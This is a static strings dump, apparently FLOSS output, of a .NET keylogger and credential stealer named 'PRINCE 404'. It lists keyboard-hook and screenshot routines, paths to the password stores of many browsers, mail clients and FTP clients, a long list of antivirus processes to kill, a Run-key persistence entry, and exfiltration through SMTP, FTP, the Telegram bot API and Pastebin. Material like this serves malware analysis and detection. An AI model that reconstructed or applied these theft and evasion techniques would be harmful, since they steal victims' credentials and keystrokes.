UnknownKeylogger3

BSJB
v4.0.30319
#Strings
#GUID
#Blob
R	V	f	k
Microsoft.VisualBasic
ApplicationBase
Microsoft.VisualBasic.ApplicationServices
Computer
Microsoft.VisualBasic.Devices
mscorlib
Object
System
User
Type
System.Windows.Forms
Timer
Process
System.Diagnostics
EventArgs
Keys
List`1
System.Collections.Generic
Enum
ValueType
MulticastDelegate
IAsyncResult
AsyncCallback
StringBuilder
System.Text
EditorBrowsableAttribute
System.ComponentModel
EditorBrowsableState
GeneratedCodeAttribute
System.CodeDom.Compiler
DebuggerHiddenAttribute
StandardModuleAttribute
Microsoft.VisualBasic.CompilerServices
HideModuleNameAttribute
HelpKeywordAttribute
System.ComponentModel.Design
RuntimeHelpers
System.Runtime.CompilerServices
RuntimeTypeHandle
Activator
MyGroupCollectionAttribute
ComVisibleAttribute
System.Runtime.InteropServices
ThreadStaticAttribute
CompilerGeneratedAttribute
Operators
ServerComputer
Conversions
FileSystemProxy
Microsoft.VisualBasic.MyServices
SpecialDirectoriesProxy
Path
System.IO
Random
Int32
String
Strings
CompareMethod
Math
EventHandler
ComputerInfo
Double
WebClient
System.Net
Stream
IWebProxy
StreamReader
Exception
WebHeaderCollection
WebRequest
CredentialCache
NetworkCredential
ICredentials
ProjectData
ClipboardProxy
FtpWebRequest
StreamWriter
Attachment
System.Net.Mail
MailMessage
SmtpClient
TextWriter
Encoding
NewLateBinding
File
IDisposable
MailAddress
MailAddressCollection
Environment
AttachmentCollection
Collection`1
System.Collections.ObjectModel
ICredentialsByHost
Directory
System.Drawing
Graphics
Bitmap
Size
Rectangle
Point
Screen
Image
DirectoryInfo
DateTime
Int64
NameValueCollection
System.Collections.Specialized
MemoryStream
GZipStream
System.IO.Compression
CompressionMode
Byte
Boolean
Assembly
System.Reflection
Application
RegistryKey
Microsoft.Win32
Registry
RegistryValueKind
Interaction
MsgBoxResult
MsgBoxStyle
WebResponse
Keyboard
AccessedThroughPropertyAttribute
STAThreadAttribute
MarshalAsAttribute
UnmanagedType
InAttribute
Delegate
Module
Marshal
IntPtr
SpecialFolder
HttpWebRequest
HttpWebResponse
Enumerator
UTF8Encoding
Convert
IEnumerable`1
Buffer
Array
System.Security
ProtectedData
System.Security.Cryptography
DataProtectionScope
FileStream
FileMode
Char
System.Xml
XmlDocument
XmlNodeList
XmlNode
XmlElement
IEnumerator
System.Collections
IEnumerable
GCHandle
GCHandleType
ICryptoTransform
MD5CryptoServiceProvider
TripleDESCryptoServiceProvider
HashAlgorithm
SymmetricAlgorithm
CipherMode
PaddingMode
TripleDES
DllImportAttribute
FlagsAttribute
StructLayoutAttribute
LayoutKind
BitConverter
Decimal
Utils
UInt64
FileSystem
OpenMode
OpenAccess
OpenShare
System.Web.Extensions
JavaScriptSerializer
System.Web.Script.Serialization
UnmanagedFunctionPointerAttribute
CallingConvention
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
.ctor
get_GetInstance
GetObjectValue
Equals
GetHashCode
GetTypeFromHandle
ToString
CreateInstance
m_ThreadStaticValue
ConcatenateObject
get_Name
GetProcesses
get_FileSystem
get_SpecialDirectories
get_MyDocuments
Combine
Next
Concat
Split
ToDouble
Round
Append
remove_Tick
add_Tick
get_Info
get_OSFullName
get_OSVersion
get_OSPlatform
get_TotalPhysicalMemory
Format
get_Headers
GetSystemWebProxy
get_DefaultNetworkCredentials
set_Credentials
set_Proxy
OpenRead
SetProjectError
ClearProjectError
ReadToEnd
Close
Replace
get_Clipboard
GetText
Contains
AddObject
CompareString
WriteLine
get_UTF8
GetBytes
LateGet
set_Method
ReadAllBytes
set_ContentLength
GetRequestStream
Write
Delete
Dispose
set_From
get_To
get_UserName
set_Subject
set_Body
get_Attachments
set_EnableSsl
ToInteger
set_Port
Send
Exists
CreateProjectError
set_Interval
get_Screen
get_Bounds
get_Width
get_Height
FromImage
CopyFromScreen
Save
CreateDirectory
get_Now
get_Ticks
get_Encoding
GetString
UploadData
Exit
UploadValues
LateCall
ChangeType
GetExecutingAssembly
GetManifestResourceStream
get_Length
Read
Start
get_ProcessName
LCase
Kill
GetProcessesByName
GetCurrentProcess
get_ExecutablePath
Left
GetTempPath
get_Millisecond
CurrentUser
OpenSubKey
SetValue
MsgBox
Create
GetResponse
InStr
Substring
get_Keyboard
get_ShiftKeyDown
get_CapsLock
Remove
GetModules
GetHINSTANCE
ToInt32
Finalize
GetFolderPath
GetResponseStream
get_Count
GetEnumerator
get_Current
MoveNext
GetSubKeyNames
GetValue
ToChar
BlockCopy
Unprotect
LocalMachine
LastIndexOf
GetDirectories
ChrW
Copy
SubtractObject
get_Default
LateSetComplex
Environ
Load
GetElementsByTagName
get_ItemOf
get_InnerText
StrReverse
FromBase64String
get_ASCII
Alloc
AddrOfPinnedObject
Free
get_Chars
ToLower
Initialize
ComputeHash
set_Mode
set_Padding
set_Key
set_IV
CreateDecryptor
TransformFinalBlock
get_Unicode
CompareObjectEqual
CompareObjectGreater
OrObject
ToBoolean
ConditionalCompareObjectEqual
ToInt64
Subtract
ToUInt16
CopyArray
Compare
ToULong
get_BigEndianUnicode
Multiply
ToUInt64
ToLong
CompareTo
IndexOf
LTrim
ConditionalCompareObjectGreater
FileOpen
Space
FileGet
FileClose
Zero
GetFiles
Deserialize
GetDelegateForFunctionPointer
GetEnvironmentVariable
AllocHGlobal
op_Inequality
FreeHGlobal
PRINCE 404.exe
<Module>
MyApplication
MyComputer
MyProject
m_ComputerObjectProvider
m_AppObjectProvider
m_UserObjectProvider
m_MyWebServicesObjectProvider
.cctor
get_Computer
get_Application
get_User
get_WebServices
WebServices
MyWebServices
GetType
Create__Instance__
instance
Dispose__Instance__
ThreadSafeObjectProvider`1
GetInstance
GClass0
infooeoe
_myTimer
_TIIMMER
_scrti
_loloa
_kebrd
_rzzzzr
string_0
string_1
THETHE
FTPEP
TELLE
TOTO
FOFO
SUSU
POPO
PTPT
USEUSE
ESUESU
URLEL
TheID
thetoken
loccle
path22
path23
path24
PASSWORD
StolsClip
login_url
post_url
dev_key
user_name
user_password
user_key
result
strin
kkkkkbssssss
_HKB
strinjj
enct
input
get_myTimer
set_myTimer
value
get_TIIMMER
set_TIIMMER
get_scrti
set_scrti
get_loloa
set_loloa
get_kebrd
set_kebrd
get_rzzzzr
set_rzzzzr
smethod_0
smethod_1
smethod_2
smethod_3
smethod_4
smethod_5
sender
oewepe
kkkAss
SCRIN
UploadMultipart
file
filename
contentType
Login
Post
paste_code
paste_name
paste_format
DecompressGZip
bytesToDecompress
LQXYGZYYRI
KJKWCCYACS
Main
smethod_6
killle
smethod_7
smethod_8
GetModuleFileNameA
kernel32
hModule
lpFileName
nSize
ExitProcess
uExitCode
MoveFileExW
lpExistingFileName
lpNewFileName
dwdvsdfdbdtyd
smethod_9
AddToStartup
name
path
Sendit
kkkA
telegramsender
tokennns
urrid
GetAsyncKeyState
user32
vKey
GetKeyState
nVirtKey
smethod_10
GetShift
smethod_11
smethod_12
kkkAssaa
get_HKB
set_HKB
GetForegroundWindow
user32.dll
GetWindowTextA
hwnd
lpString
GAWT
shiftandcaps
myTimer
TIIMMER
scrti
loloa
kebrd
rzzzzr
Class0
cPass
opera_salt
key_size
pathsss
DOutput
Opass
encryptedData
pHash
smethod_13
smethod_14
smethod_15
smethod_16
smethod_17
smethod_18
smethod_19
smethod_20
smethod_21
smethod_22
smethod_23
smethod_24
smethod_25
smethod_26
smethod_27
smethod_28
smethod_29
smethod_30
smethod_31
smethod_32
CryptUnprotectData
Crypt32.dll
pDataIn
szDataDescr
pOptionalEntropy
pvReserved
pPromptStruct
dwFlags
pDataOut
smethod_33
Datas
smethod_34
smethod_35
encrypt_data
GClass1
db_bytes
page_size
encoding
master_table_entries
SQLDataTypeSize
table_entries
field_names
startIndex
endIndex
IsOdd
method_0
ReadMasterTable
Offset
method_1
ReadTable
TableName
GetRowCount
row_num
field
GetTableNames
baseName
GClass2
Class3
NSS3
hModuleList
LoadLibrary
kernel32.dll
dllFilePath
GetProcAddress
procName
CreateAPI
method
NSS_Shutdown
FreeLibrary
NSS_Inite
configdir
Decrypt
cypherText
data
GClass3
_Url
_Username
_Password
get_Url
set_Url
get_Username
set_Username
get_Password
set_Password
Username
Password
kjdshfi23ur9fjsdfmiowuf9sods
HC_ACTION
WH_KEYBOARD_LL
WM_KEYDOWN
WM_KEYUP
WM_SYSKEYDOWN
WM_SYSKEYUP
KDEvent
KUEvent
SetWindowsHookExA
idHook
lpfn
hmod
dwThreadId
CallNextHookEx
hHook
nCode
wParam
lParam
UnhookWindowsHookEx
add_KD
remove_KD
add_KU
remove_KU
KeyboardProcwew
Class1
_appName
_username
_password
_URL
set_UserName
get_URL
set_URL
get_appName
set_appName
UserName
appName
CryptProtectPromptFlags
value__
CRYPTPROTECT_PROMPT_ON_UNPROTECT
CRYPTPROTECT_PROMPT_ON_PROTECT
CRYPTPROTECT_PROMPTSTRUCT
cbSize
dwPromptFlags
hwndApp
szPrompt
DATA_BLOB
cbData
pbData
record_header_field
size
type
table_entry
row_id
content
sqlite_master_entry
item_type
item_name
astable_name
root_num
sql_statement
FFLogins
_nextId
_logins
_disabledHosts
_version
get_nextId
set_nextId
get_logins
set_logins
get_disabledHosts
set_disabledHosts
get_version
set_version
nextId
logins
disabledHosts
version
Class2
_hostname
_url
_httprealm
_formSubmitURL
_usernameField
_passwordField
_encryptedUsername
_encryptedPassword
_guid
_encType
_timeCreated
_timeLastUsed
_timePasswordChanged
_timesUsed
get_id
set_id
get_hostname
set_hostname
get_url
set_url
get_httprealm
set_httprealm
get_formSubmitURL
set_formSubmitURL
get_usernameField
set_usernameField
get_passwordField
set_passwordField
get_encryptedUsername
set_encryptedUsername
get_encryptedPassword
set_encryptedPassword
get_guid
set_guid
get_encType
set_encType
get_timeCreated
set_timeCreated
get_timeLastUsed
set_timeLastUsed
get_timePasswordChanged
set_timePasswordChanged
get_timesUsed
set_timesUsed
hostname
httprealm
formSubmitURL
usernameField
passwordField
encryptedUsername
encryptedPassword
guid
encType
timeCreated
timeLastUsed
timePasswordChanged
timesUsed
DLLFunctionDelegate6
TargetObject
TargetMethod
BeginInvoke
DelegateCallback
DelegateAsyncState
EndInvoke
DelegateAsyncResult
Invoke
DLLFunctionDelegate
DLLFunctionDelegate4
arenaOpt
outItemOpt
inStr
inLen
DLLFunctionDelegate5
TSECItem
SECItemType
SECItemData
SECItemLen
sadfgbui32yur89usjdf8934rtf
sdicyhsjcjsdnc
scancode
flags
time
dwExtraInfo
KeyboardProcDelegateee
KDEventHandler
KUEventHandler
PRINCE 404
^1b1
b1[1^1V1
"C7+D
MyTemplate
14.0.0.0
My.Application
My.User
My.Computer
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
rzzzzr
kebrd
loloa
scrti
TIIMMER
myTimer
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>

FLOSS static UTF-16 strings
Persistence'False
------- + INFO + -------
IP:
Owner Name:
OS Name:
OS Version:
OS PlatForm:
RAM Size:
-------------------------
False
shushu
TRUSSTS
[email protected]
smtp.privateemail.com
<redacted>
Results.txt
Clipboardlog.txt
Leyboardlogs.txt
{0:f2} GB
user-agent
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
http://checkip.dyndns.org/
<html><head><title>Current IP Check</title></head><body>
</body></html>
Current IP Address:
http
<http>
True
.txt
|------- Results - Clipboard Logs -------|
---------------------------------------------
Create
Clipboard -
STOR
 Clipboard Logs | Client Name:
Tretzhh
 Clipboard Logs | Client Name:
|------- Results - Clipboard Logs -------|
Screenshot
.png
\404k
\404k\
Screenshot -
 Screenshot | Client Name:
|------ Results - Screenshot ------|
------------------------
Content-Type
multipart/form-data; boundary=
--{0}
Content-Disposition: form-data; name="document"; filename="{1}"
Content-Type: {2}
--{0}--
POST
api_dev_key
api_user_name
api_user_password
https://pastebin.com/api/api_login.php
Bad API request
api_user_key
api_option
paste
api_paste_code
api_paste_name
api_paste_format
api_paste_private
api_paste_expire_date
https://pastebin.com/api/api_post.php
Read
Write
ToArray
MSGtype12
chrome
zlclient
egui
bdagent
npfmsg
olydbg
anubis
wireshark
avastui
_Avp32
vsmon
mbam
keyscrambler
_Avpcc
_Avpm
Ackwin32
Outpost
Anti-Trojan
ANTIVIR
Apvxdwin
ATRACK
Autodown
Avconsol
Ave32
Avgctrl
Avkserv
Avnt
Avp32
Avpcc
Avpdos32
Avpm
Avptc32
Avpupd
Avsched32
AVSYNMGR
Avwin95
Avwupd32
Blackd
Blackice
Cfiadmin
Cfiaudit
Cfinet
Cfinet32
Claw95
Claw95cf
Cleaner
Cleaner3
Defwatch
Dvp95
Dvp95_0
Ecengine
Esafe
Espwatch
F-Agnt95
Findviru
Fprot
F-Prot
F-Prot95
Fp-Win
F-Stopw
Iamapp
Iamserv
Ibmasn
Ibmavsp
Icload95
Icloadnt
Icmon
Icsupp95
Icsuppnt
Iface
Iomon98
Jedi
Lockdown2000
Lookout
Luall
MCAFEE
Moolive
Mpftray
N32scanw
NAVAPSVC
NAVAPW32
NAVLU32
Navnt
NAVRUNR
Navw32
Navwnt
NeoWatch
NISSERV
Nisum
Nmain
Normist
NORTON
Nupgrade
Nvc95
Padmin
Pavcl
Pavsched
Pavw
PCCIOMON
PCCMAIN
Pccwin98
Pcfwallicon
Persfw
POP3TRAP
PVIEW95
Rav7
Rav7win
Rescue
Safeweb
Scan32
Scan95
Scanpm
Scrscan
Serv95
SMCSERVICE
Snort
Sphinx
Sweep95
SYMPROXYSVC
Tbscan
Tds2-98
Tds2-Nt
TermiNET
Vet95
Vettray
Vscan40
Vsecomr
Vshwin32
Vsstat
Webscanx
WEBTRAP
Wfindv32
Zonealarm
LOCKDOWN2000
RESCUE32
LUCOMSERVER
avgcc
avgamsvr
avgupsvc
avgw
avgcc32
avgserv
avgserv9
avgserv9schedapp
avgemc
ashwebsv
ashdisp
ashmaisv
ashserv
aswUpdSv
symwsc
norton
Norton Auto-Protect
norton_av
nortonav
ccsetmgr
ccevtmgr
avadmin
avcenter
avgnt
avguard
avnotify
avscan
guardgui
nod32krn
nod32kui
clamscan
clamTray
clamWin
freshclam
oladdin
sigtool
w9xpopen
Wclose
cmgrdian
alogserv
mcshield
vshwin32
avconsol
vsstat
avsynmgr
avcmd
avconfig
licmgr
sched
preupd
MsMpEng
MSASCui
Avira.Systray
\tmpG
.tmp
software\microsoft\windows\currentversion\run
|------- Results - Passwords -------|
---------------------------------------------
Results -
 PSWD | Client Name:
Vavaa
---------------------------------------------
Results
 PSWD | Client Name:
|------- Results - Passwords -------|
https://api.telegram.org/bot
/sendMessage?chat_id=
&text=
|------- Results - Keyboard Logs -------|
Keyboard -
 Keyboard Logs | Client Name:
|------- Results - Keyboard Logs -------|
[BACK]
[F1]
[F2]
[F3]
[F4]
[F5]
[F6]
[F7]
[F8]
[F9]
[F10]
[F11]
[F12]
[TAB]
[END]
[ESC]
https://myip.dnsomatic.com
==== + Outlook + ====
URL:
Email:
Password:
=============================
IMAP Password
POP3 Password
HTTP Password
SMTP Password
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Email
GetBytes
SMTP Server
Nothing
Outlook
SOFTWARE\Classes\Foxmail.url.mailto\Shell\open\command
Foxmail.exe
Storage\
\Accounts\Account.rec0
Account
POP3Account
Password
POP3Password
==== + Foxmail + ====
E-Mail: {0}
Password: {0}
\Google\Chrome\User Data\Default\Login Data
ReadTable
logins
GetRowCount
GetValue
origin_url
username_value
password_value
==== + Google Chrome + ====
Host:
Username:
AppData
\.purple\accounts.xml
protocol
name
password
===== + Pidgin + =====
Protocol:
\Liebao7\User Data\Default\EncryptedStorage
entries
str3
str2
blob0
===== + Liebao + =====
Host:
\AVAST Software\Browser\User Data\Default\Login Data
snigol
lru_nigiro
eulav_emanresu
eulav_drowssap
===== + Avast + =====
Host:
\Tencent\QQBrowser\User Data\Default\Login Data
==== + QQ Browser + ====
Host:
\Orbitum\User Data\Default\Login Data
==== + Orbitum Browser + ====
Host:
\CocCoc\Browser\User Data\Default\Login Data
==== + Coc Coc Browser + ====
Host:
\Slimjet\User Data\Default\Login Data
==== + Slimjet Browser + ====
Host:
\Iridium\User Data\Default\Login Data
==== + Iridium Browser + ====
Host:
\Vivaldi\User Data\Default\Login Data
==== + Vivaldi Browser + ====
Host:
\Chromium\User Data\Default\Login Data
==== + Iron Browser + ====
Host:
==== + Chromium Browser + ====
Host:
\GhostBrowser\User Data\Default\Login Data
==== + Ghost Browser + ====
Host:
\CentBrowser\User Data\Default\Login Data
==== + Cent Browser + ====
Host:
\Xvast\User Data\Default\Login Data
==== + Xvast Browser + ====
Host:
\Chedot\User Data\Default\Login Data
==== + Chedot + ====
Host:
\SuperBird\User Data\Default\Login Data
==== + SuperBird Browser + ====
Host:
\360Browser\Browser\User Data\Default\Login Data
==== + 360 Browser + ====
Host:
\360Chrome\Chrome\User Data\Default\Login Data
\Comodo\Dragon\User Data\Default\Login Data
==== + Comodo Dragon + ====
Host:
\BraveSoftware\Brave-Browser\User Data\Default\Login Data
==== + Brave Browser + ====
Host:
\Torch\User Data\Default\Login Data
==== + Torch Browser + =====
Host:
\UCBrowser\User Data_i18n\Default\UC Login Data.18
wow_logins
==== + UC Browser + =====
Host:
\Blisk\User Data\Default\Login Data
==== + Blisk Browser + =====
Host:
\Epic Privacy Browser\User Data\Default\Login Data
==== + Epic Browser + =====
Host:
ataD nigoL\elbatS arepO\erawtfoS arepO\
tad.dnaw\eliforp\arepO\arepO\
==== + Opera Browser + ====
Host:
APPDATA
\FileZilla\recentservers.xml
Host
User
Pass
Port
===== + FileZilla  + =====
Host:
Username:
Password:
Port:
abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
IndexOf
Substring
UNIQUE
table
Mozilla\Firefox\Profiles
logins.json
===== + FireFox + =====
Host:
=============================
Thunderbird\Profiles\
===== + Thunderbird + =====
Host:
Mozilla\SeaMonkey\Profiles
===== + SeaMonkey + =====
Host:
Comodo\IceDragon\Profiles
===== + Comodo IceDeagon + =====
Host:
8pecxstudios\Cyberfox\Profiles
===== + Cyber Fox + =====
Host:
Moonchild Productions\Pale Moon\Profiles
===== + Pale Moon + =====
Host:
NSS_Shutdown
PROGRAMFILES
\Mozilla Thunderbird\
\Mozilla Firefox\
\SeaMonkey\
\Comodo\IceDragon\
\Cyberfox\
\Pale Moon\
\mozglue.dll
\nss3.dll
NSS_Init
https://pastebin.com/api/api_login.php
https://pastebin.com/api/api_post.php
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
PRINCE 404.exe
LegalCopyright
OriginalFilename
PRINCE 404.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0